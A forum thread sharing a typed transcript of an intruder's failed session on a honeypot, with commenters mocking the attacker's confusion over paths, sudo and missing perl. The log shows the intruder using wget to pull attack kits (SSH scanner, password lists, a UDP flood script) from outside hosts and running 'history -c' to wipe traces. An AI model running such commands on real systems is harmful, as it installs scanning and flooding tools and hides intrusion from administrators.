Honeypot wtf
-
For some reason this seems funny to me.
-
www2:~# w 09:06:10 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 10.34.18.5 09:06 0.00s 0.00s 0.00s w www2:~# wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. www2:~# wget http://fakehlds.com/fakehlds32.tar.gz --2011-01-20 09:06:22-- http://fakehlds.com/fakehlds32.tar.gz Connecting to fakehlds.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 148729 (145K) [application/x-gzip] Saving to: `fakehlds32.tar.gz 100%[======================================>] 148,729 2K/s eta 55s 2011-01-20 09:06:24 (2 KB/s) - `fakehlds32.tar.gz' saved [148729/148729] www2:~# sudo apt-get install ruby1.8 libopenssl-ruby1.8 bash: sudo: command not found www2:~# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme. www2:~# ls -a . .. .debtags .viminfo .aptitude .profile .bashrc fakehlds32.tar.gz www2:~# wget http://203.128.7.10/~admin/ka.tar --2011-01-20 09:07:21-- http://203.128.7.10/~admin/ka.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4884480 (4M) [application/x-tar] Saving to: `ka.tar 100%[======================================>] 4,884,480 446K/s eta 0s 2011-01-20 09:07:33 (446 KB/s) - `ka.tar' saved [4884480/4884480] www2:~# tar xvf ka.tar a/1 a/2 a/3 a/4 a/5 a/a a/common a/gen-pass.sh a/go.sh a/pass_file a/pscan2 a/scam a/secure a/ss a/ssh-scan a/vuln.txt www2:~# rm -rf ka.tar www2:~# cd /var/spool/samba/a bash: cd: /var/spool/samba/a: No such file or directory www2:~# cd /var/spool/samba bash: cd: /var/spool/samba: No such file or directory www2:~# cd /var www2:/var# cd /spool bash: cd: /spool: No such file or directory www2:/var# cd /samba bash: cd: /samba: No such file or directory www2:/var# cd /a bash: cd: /a: No such file or directory www2:/var# cd a bash: cd: a: No such file or directory www2:/var# cd spool www2:/var/spool# cd samba bash: cd: samba: No such file or directory www2:/var/spool# cd a bash: cd: a: No such file or directory www2:/var/spool# chmod +x * www2:/var/spool# ./go.sh 92 bash: ./go.sh: command not found www2:/var/spool# wget http://203.128.7.10/~admin/udppl.tar --2011-01-20 09:09:19-- http://203.128.7.10/~admin/udppl.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10240 (10K) [application/x-tar] Saving to: `udppl.tar 100%[======================================>] 10,240 3K/s eta 2s 2011-01-20 09:09:20 (3 KB/s) - `udppl.tar' saved [10240/10240] www2:/var/spool# tar xvf udppl.tar udp/udp.pl www2:/var/spool# chmod +x * www2:/var/spool# perl udp.pl bash: perl: command not found www2:/var/spool# wget http://203.128.7.10/~admin/k08.tgz --2011-01-20 09:09:51-- http://203.128.7.10/~admin/k08.tgz Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 404 Not Found www2:/var/spool# cd udp www2:/var/spool/udp# perl bash: perl: command not found www2:/var/spool/udp# udp.pl bash: udp.pl: command not found www2:/var/spool/udp# wget http://download.microsoft.com/download/win2000platform /SP/SP3/NT5/EN-US/W2Ksp3.exe --2011-01-20 09:10:20-- http://download.microsoft.com/download/win2000platform/ SP/SP3/NT5/EN-US/W2Ksp3.exe Connecting to download.microsoft.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 130978672 (124M) [application/octet-stream] Saving to: `W2Ksp3.exe 100%[======================================>] 130,978,672 5225K/s eta 0s 2011-01-20 09:10:45 (5225 KB/s) - `W2Ksp3.exe' saved [130978672/130978672] www2:/var/spool/udp# wget http://203.128.7.10/~admin/k08.tgz --2011-01-20 09:11:00-- http://203.128.7.10/~admin/k08.tgz Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 404 Not Found www2:/var/spool/udp# wget http://203.128.7.10/~admin/udppl.tar --2011-01-20 09:11:11-- http://203.128.7.10/~admin/udppl.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10240 (10K) [application/x-tar] Saving to: `udppl.tar 100%[======================================>] 10,240 4K/s eta 1s 2011-01-20 09:11:12 (4 KB/s) - `udppl.tar' saved [10240/10240] www2:/var/spool/udp# tar xvf udppl.tar udp/udp.pl www2:/var/spool/udp# ls -a . .. udp.pl W2Ksp3.exe udppl.tar udp www2:/var/spool/udp# cd udp www2:/var/spool/udp/udp# chmod +x * www2:/var/spool/udp/udp# perl udp.pl bash: perl: command not found www2:/var/spool/udp/udp# wget http://203.128.7.10/~admin/ka.tar --2011-01-20 09:12:13-- http://203.128.7.10/~admin/ka.tar Connecting to 203.128.7.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4884480 (4M) [application/x-tar] Saving to: `ka.tar 100%[======================================>] 4,884,480 591K/s eta 0s 2011-01-20 09:12:21 (591 KB/s) - `ka.tar' saved [4884480/4884480] www2:/var/spool/udp/udp# tar xvf ka.tar a/1 a/2 a/3 a/4 a/5 a/a a/common a/gen-pass.sh a/go.sh a/pass_file a/pscan2 a/scam a/secure a/ss a/ssh-scan a/vuln.txt www2:/var/spool/udp/udp# rm -rf ka.tar www2:/var/spool/udp/udp# 213.248.54.246 bash: 213.248.54.246: command not found www2:/var/spool/udp/udp# cd /var/spool/samba bash: cd: /var/spool/samba: No such file or directory www2:/var/spool/udp/udp# cd /var/spool/samba/a bash: cd: /var/spool/samba/a: No such file or directory www2:/var/spool/udp/udp# cd /var/spool www2:/var/spool# cd samba bash: cd: samba: No such file or directory www2:/var/spool# cd ". " bash: cd: . : No such file or directory www2:/var/spool# cd a bash: cd: a: No such file or directory www2:/var/spool# cd /a bash: cd: /a: No such file or directory www2:/var/spool# ifconfig eth0 Link encap:Ethernet HWaddr 00:4c:a832:f4 inet addr:10.98.55.4 Bcast:10.98.55.255 Mask:255.255.255.0 inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0 TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 RX bytes:50588302699 (47.1 GiB) TX bytes:97318807157 (90.6 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:308297 errors:0 dropped:0 overruns:0 frame:0 TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:355278106 (338.8 MiB) TX bytes:355278106 (338.8 MiB) www2:/var/spool#cd /var/spool/samba bash: cd: /var/spool/samba: No such file or directory www2:/var/spool# wget http://fakehlds.com/fakehlds64.tar.gz --2011-01-20 09:16:25-- http://fakehlds.com/fakehlds64.tar.gz Connecting to fakehlds.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: 150995 (147K) [application/x-gzip] Saving to: `fakehlds64.tar.gz 100%[======================================>] 150,995 18K/s eta 7s 2011-01-20 09:16:26 (18 KB/s) - `fakehlds64.tar.gz' saved [150995/150995] www2:/var/spool# sudo apt-get install ruby1.8 libopenssl-ruby1.8 bash: sudo: command not found www2:/var/spool# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme. www2:/var/spool# cd ruby-1.8.7-p72 bash: cd: ruby-1.8.7-p72: No such file or directory www2:/var/spool# tar xzvf ruby-1.8.7-p72.tar.gz tar: ruby-1.8.7-p72.tar.gz: Cannot open: No such file or directory tar: Error is not recoverable: exiting now tar: Child returned status 2 tar: Error exit delayed from previous errors www2:/var/spool# ls -a . .. mail udppl.tar udp fakehlds64.tar.gz www2:/var/spool# perl bash: perl: command not found www2:/var/spool# wget ely.uv.ro/scan.tar.gz --2011-01-20 09:18:18-- http://ely.uv.ro/scan.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget ely.uv.ro/john.tar.gz --2011-01-20 09:18:34-- http://ely.uv.ro/john.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget http://bodylanguage.uv.ro/unixcod.tar.gz --2011-01-20 09:18:55-- http://bodylanguage.uv.ro/unixcod.tar.gz Connecting to bodylanguage.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget www.shoarec.go.ro/udp.pl --2011-01-20 09:19:12-- http://www.shoarec.go.ro/udp.pl Connecting to shoarec.go.ro:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: `udp.pl 100%[======================================>] 0 2K/s eta -1s 2011-01-20 09:19:14 (2 KB/s) - `udp.pl' saved [19017/0] www2:/var/spool# wget ely.uv.ro/emech.tar.gz --2011-01-20 09:19:33-- http://ely.uv.ro/emech.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget ely.uv.ro/emech.tar.gz; --2011-01-20 09:19:37-- http://ely.uv.ro/emech.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz --2011-01-20 09:20:09-- http://ely.uv.ro/radiobsd.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz --2011-01-20 09:30:51-- http://ely.uv.ro/radiobsd.tar.gz Connecting to ely.uv.ro:80... connected. HTTP request sent, awaiting response... 403 Forbidden www2:/var/spool# history -c www2:/var/spool# exit Connection to server closed. localhost:~# exit
-
@anotherusername said:
wget http://download.microsoft.com/download/win2000platform /SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exeSo . . . he downloaded Windows 2000 Service Pack 3.
In 2011.
Wow.
-
@El_Heffe said:
@anotherusername said:
wget http://download.microsoft.com/download/win2000platform
/SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exeSo . . . he downloaded Windows 2000 Service Pack 3.
In 2011.
Wow.
Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.
-
@Evo said:
@El_Heffe said:
@anotherusername said:
wget http://download.microsoft.com/download/win2000platform
/SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exeSo . . . he downloaded Windows 2000 Service Pack 3.
In 2011.
Wow.
Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.
Actually, my favourite part was the complete ignorance of how paths work. Lots and lots and lots of cd commands... with/without a leading slash (obviously doesn't have a clue what that means), removing/adding subfolders to the path because the first cd didn't work, etc...
(That, or the 6pt font that showed up when I first tried posting the <pre> block.)
-
@Evo said:
Nobody's THAT stupid.
He gave up trying install ruby because there is no sudo. All that while logged in as root.
He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.
-
@Mcoder said:
It was /var/spool/samba. Apparently the cheat sheet he was following assumed that /var/spool/samba was the current path, because then he tried to cd /var/spool/samba/a, which was supposed to be what he just unpackaged with tar.@Evo said:
Nobody's THAT stupid.
He gave up trying install ruby because there is no sudo. All that while logged in as root.
He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.
-
...
perl? not found
try to download file
perl? not found
perl? not found
download w2ksp3
download file
look at directory
change permissions on directory
perl? not found
extract file
ip address
wrong directory
wrong directory
wrong dircectory
...
check ethernet settings
same wrong directory
download another file
try to install ruby
perl? not found
...Someone in the comments said that w2k was probably a speed test, but I still don't see what that is supposed to for 403 errors or perl not existing.
In other news how did you get the text?
-
@Chame1eon said:
In other news how did you get the text?
My laptop came with a newfangled accessory called a "keyboard".
-
@anotherusername said:
@Chame1eon said:
In other news how did you get the text?
My laptop came with a newfangled accessory called a "keyboard".I didn't consider typing the whole thing. Maybe I am lazy.
-
@Chame1eon said:
The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it. Oh, and I obviously had nothing better to do.@anotherusername said:
@Chame1eon said:
In other news how did you get the text?
My laptop came with a newfangled accessory called a "keyboard".I didn't consider typing the whole thing. Maybe I am lazy.
-
@anotherusername said:
@Chame1eon said:
The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.@anotherusername said:
@Chame1eon said:
In other news how did you get the text?
My laptop came with a newfangled accessory called a "keyboard".I didn't consider typing the whole thing. Maybe I am lazy.
That makes sense.
-
@Chame1eon said:
@anotherusername said:
He watched the video and typed up a transcript of the whole thing?@Chame1eon said:
@anotherusername said:
The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.@Chame1eon said:
I didn't consider typing the whole thing. Maybe I am lazy.In other news how did you get the text?
My laptop came with a newfangled accessory called a "keyboard".That makes sense.
Wow, and I thought I led a boring life.
-
@El_Heffe said:
He watched the video and typed up a transcript of the whole thing?
Wow, and I thought I led a boring life.
Maybe you need a bit of Excel road rage to spice up that boring life.
-
@Ronald said:
@El_Heffe said:
He watched the video and typed up a transcript of the whole thing?
Wow, and I thought I led a boring life.
Maybe you need a bit of Excel road rage to spice up that boring life.
Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.
-
@Zemm said:
@Ronald said:
@El_Heffe said:
He watched the video and typed up a transcript of the whole thing?
Wow, and I thought I led a boring life.
Maybe you need a bit of Excel road rage to spice up that boring life.
Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.
If you picture a VB game embedded in Excel, you'll pretty much have the idea.
I never much liked putting VB inside Excel spreadsheets. It feels dirty and oh-so-wrong. The only spreadsheet I've done that to had to pull a page from the Internet and screen scrape some values off it, and Excel's built-in data import wizard was woefully inadequate for the task. And if the security settings didn't allow scripting (which the default won't), everything on the spreadsheet still worked except for the button that pulled those values.
-
@anotherusername said:
If you picture a VB game embedded in Excel, you'll pretty much have the idea.
If only we could still harness the power of the flight simulator in excel 97 all would be right